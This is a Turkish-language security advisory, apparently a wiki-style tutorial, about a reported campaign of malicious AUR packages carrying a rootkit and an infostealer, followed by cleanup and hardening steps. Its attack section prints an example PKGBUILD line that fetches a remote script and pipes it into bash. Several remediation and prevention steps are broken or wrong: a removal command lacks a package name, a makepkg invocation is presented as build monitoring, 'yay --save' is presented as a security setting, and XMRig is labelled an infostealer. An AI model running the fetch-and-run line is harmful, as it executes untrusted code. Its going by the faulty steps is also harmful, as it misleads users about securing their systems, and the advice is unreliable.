Arch Linux AUR Paketlerinde Kök Kiti ve Bilgi Hırsızı Dağıtımı (400+ Paket)

Arch Linux AUR deposunda bulunan 400'den fazla paketin kök kiti ve bilgi hırsızı dağıttığı tespit edildi. Kullanıcı kimlik bilgileri ve erişim token'ları hedef alınıyor.

B

Bleeping Computer Tutorials

13 Haziran 202619 görüntülenme

Arch Linux AUR Paketlerinde Kök Kiti ve Bilgi Hırsızı Dağıtımı (400+ Paket)

Sorun Tanımı

Arch Linux'un topluluk tarafından yönetilen paket deposu olan Arch User Repository (AUR)'da bulunan 400'den fazla paketin, Linux rootkit ve infostealer (bilgi hırsızı) malware ile dağıtıldığı tespit edilmiştir. Bu saldırıda, hedeflenen sistemlerde yetki yükseltmesi (privilege escalation) gerçekleştirilerek, kullanıcı kimlik bilgileri, SSH anahtarları, tarayıcı çerezleri ve API erişim token'ları gibi hassas veriler çalınmaktadır.

Saldırganlar, bu paketleri orijinal gibi görünen sahte versiyonlarla değiştirerek, kullanıcıların sistemlerine zararlı yazılımları indirebilmelerini sağlamaktadır. Saldırı, özellikle AUR kullanıcıları arasında yaygınlaşmış olup, sistem güvenliğini ciddi şekilde tehdit etmektedir.

Etkilenen Paketler ve Saldırı Yöntemi

Etkilenen Paketler

Aşağıdaki paketler saldırıya uğramış olup, PKGBUILD dosyalarında gizlenmiş zararlı komutlar bulunmaktadır:

acroread, libreoffice-still, python-pip, nodejs-lts-gallium, yay ve daha birçok popüler paket.

Not: Tam listeye GitHub'daki resmi AUR güvenlik deposu üzerinden ulaşılabilir.

Saldırı Mekanizması

Paket Enjekte Edilmesi: Saldırganlar, AUR depolarına orijinal paketleri taklit eden sahte versiyonlar yüklemektedir. Bu paketler, PKGBUILD dosyalarında zararlı komutlar içermektedir.
Derleme Sırasında Enfeksiyon: Zararlı komutlar, paket derlenirken çalıştırılmak üzere PKGBUILD dosyasına gizlenmektedir. Örneğin:
```
prepare() {
    curl -s https://malicious-site.com/payload.sh | bash
}
```
Kök Kiti Kurulumu: Paket kurulumu sırasında, sistemde Linux rootkit (örneğin, Diamorphine) ve infostealer (örneğin, XMRig kripto madencisi ve veri çalma araçları) yüklenmektedir.
Veri Toplanması ve Aktarılması: Rootkit, sistemdeki hassas verileri toplar ve saldırganın kontrolündeki bir sunucuya gönderir. Bu veriler arasında:
- Kullanıcı adı ve parolalar
- SSH anahtarları
- Tarayıcı çerezleri ve oturum bilgileri
- API token'ları

Etki ve Riskler

Sistem Güvenliğine Etkileri

Bu saldırının sonuçları oldukça ciddidir:

Yetki Yükseltmesi: Rootkit, saldırganın sistemde root yetkilerine sahip olmasını sağlayabilir.
Veri Sızıntısı: Kullanıcı kimlik bilgileri, finansal veriler ve diğer hassas bilgiler çalınabilir.
Sistem Kaynaklarının Kötüye Kullanılması: Enfekte sistemler, kripto madenciliği veya DDoS saldırıları için kullanılabilir.
Diğer Zararlı Yazılımların Yüklenmesi: Rootkit, sistemde daha fazla zararlı yazılımın yüklenmesine olanak tanır.

Risk Altındaki Kullanıcılar

Aşağıdaki kullanıcı grupları saldırıdan daha yüksek risk altındadır:

AUR kullanıcıları: Özellikle popüler paketleri kuran kullanıcılar.
Geliştiriciler: Paketleri AUR'a yükleyen veya güncelleyen geliştiriciler.
Sistem Yöneticileri: Birden fazla Arch Linux sistemi yöneten kişiler.

Çözüm ve Temizleme Adımları

1. Etkilenen Paketlerin Tespiti

Aşağıdaki komutla sistemde yüklü olan AUR paketlerini listeleyin:
```
pacman -Qm
```
Etkilenen paketlerin listesini AUR güvenlik deposu ile karşılaştırın.
Şüpheli paketleri not alın.

2. Etkilenen Paketlerin Kaldırılması

Sisteminizi tek kullanıcı moduna alın (önemli verileri yedekleyin):
```
systemctl rescue
```
Etkilenen paketleri kaldırın:
```
sudo pacman -Rns  --noconfirm
```
Uyarı: --noconfirm parametresi, paket kaldırma sırasında onay sorulmasını engeller. Dikkatli kullanın.
Paketlerin bağımlılıklarını da kaldırın:
```
sudo pacman -Rns $(pacman -Qdtq)
```

3. Sistemde Rootkit Kontrolü

Aşağıdaki araçlarla sistemde rootkit olup olmadığını kontrol edin:
- rkhunter:
```
sudo pacman -S rkhunter
sudo rkhunter --check
```
- chkrootkit:
```
sudo pacman -S chkrootkit
sudo chkrootkit
```
Eğer rootkit tespit edilirse, sisteminizi yeniden kurmanız önerilir. Rootkit'ler genellikle sistemde derinlere yerleştiğinden, tamamen temizlenmesi zordur.

4. SSH Anahtarlarının ve Kimlik Bilgilerinin Değiştirilmesi

SSH anahtarlarınızı yenileyin:

rm -f ~/.ssh/id_rsa ~/.ssh/id_rsa.pub
ssh-keygen -t rsa -b 4096

Tüm hesaplarınızda (e-posta, bankacılık, sosyal medya vb.) şifrelerinizi değiştirin.
Tarayıcı oturumlarınızı temizleyin ve çerezleri silin.

5. AUR Kullanımının Güvenli Hale Getirilmesi

AUR paketlerini kurarken aşağıdaki adımları izleyin:
- PKGBUILD dosyasını inceleyin: Kuracağınız paketin PKGBUILD dosyasını AUR web sitesi üzerinden veya yerel kopyasından kontrol edin.
- Derleme sırasında izleme: Paketi kurarken aşağıdaki komutla derleme sürecini izleyin:
```
makepkg --nobuild --noprepare --noextract
```
- Yalnızca güvenilir kaynaklardan indirin: AUR paketlerini yay, paru gibi güvenilir AUR yardımcılarıyla kurun.
AUR paketlerini güncellerken dikkatli olun. Güncellemeler sırasında da zararlı kodlar enjekte edilebilir.

Önleyici Tedbirler

Genel Güvenlik Önerileri

Önemli: AUR paketlerini kullanırken, her zaman güvenlik açıklarını ve topluluk geri bildirimlerini takip edin. Paketleri kurmadan önce inceleyin ve yalnızca gerekli olduğunda kullanın.

Güvenilir Depolar Kullanın: Resmi Arch Linux deposu (core, extra, community) dışındaki paketleri dikkatli kullanın.
Paket İmzalama: AUR paketlerini kurarken gpg imzalarını kontrol edin. İmzası olmayan paketleri kurmayın.
Güncellemeleri Takip Edin: Sistem güncellemelerini düzenli olarak yapın ve güvenlik yamalarını uygulayın.
Güvenlik Duvarı Kullanın: ufw veya firewalld gibi güvenlik duvarlarını kullanarak gereksiz ağ erişimlerini engelleyin.
Sistem İzleme: auditd gibi araçlarla sistem aktivitelerini izleyin ve şüpheli davranışları tespit edin.

AUR Yardımcıları için Öneriler

AUR yardımcıları (yay, paru, pikaur) kullanırken aşağıdaki ayarları yapın:

# yay için
sudo pacman -S yay
yay --save # AUR paketlerini kaydedin

# paru için
sudo pacman -S paru
paru --save

Not: Bu ayarlar, AUR paketlerinin güvenliğini artırmak için önerilen bir yaklaşımdır.

Sıkça Sorulan Sorular (SSS)

Saldırıdan nasıl korunabilirim?

En etkili yöntem, AUR paketlerini yalnızca gerekli olduğunda ve dikkatlice kullanmaktır. Paketleri kurmadan önce PKGBUILD dosyasını inceleyin ve güvenilir kaynaklardan indirin. Ayrıca, sistemdeki rootkit'leri tespit etmek için düzenli kontroller yapın.

Etkilenen bir paketi kaldırdım, sistemim temiz mi?

Paketi kaldırmak, rootkit'in sistemden tamamen temizlendiği anlamına gelmez. Rootkit'ler genellikle sistemde derinlere yerleştiğinden, tam bir temizlik için sisteminizi yeniden kurmanız önerilir.

AUR yerine resmi depoları kullanabilir miyim?

Evet, resmi Arch Linux depoları (core, extra, community) güvenilirdir ve topluluk tarafından denetlenmektedir. Mümkün olduğunca bu depoları kullanın.

Ek Kaynaklar

Kaynak

Bleeping Computer Tutorials

Wiki'ye Dön

İlgili Makaleler

18 Haziran 2026

Klue OAuth Sızdırma Olayı: 'Icarus' Tehdit Aktörlerinin Salesforce CRM Veri Hırsızlığı Saldırıları

Klue pazar istihbarat platformunda yaşanan OAuth yetki sızması, 'Icarus' tehdit aktörlerine Salesforce CRM verilerini çalma ve fidye saldırıları gerçekleştirme olanağı sağladı.

8Makaleyi Oku →

18 Haziran 2026

Nintendo, WebMD yan kuruluşuna yapılan siber saldırıda veri hırsızlığını doğruladı

Nintendo of America, üçüncü parti TinyPulse hizmetinden iç veri tabanı anket verilerinin çalındığını doğruladı. Saldırı sırasında Nintendo'nun kendi sistemleri tehlikeye girmemiştir.

9Makaleyi Oku →

18 Haziran 2026

Apple Beats Studio Buds Güvenlik Açığı: Saldırganların Bluetooth Üzerinden Konuşmaları Dinlemesi

Apple, Beats Studio Buds kulaklıklarında bulunan yüksek önemdeki güvenlik açığını düzeltmek için güncelleme yayınladı. Saldırganlar, Bluetooth menzilindeyken kullanıcıların konuşmalarını dinleyebiliyordu.

8Makaleyi Oku →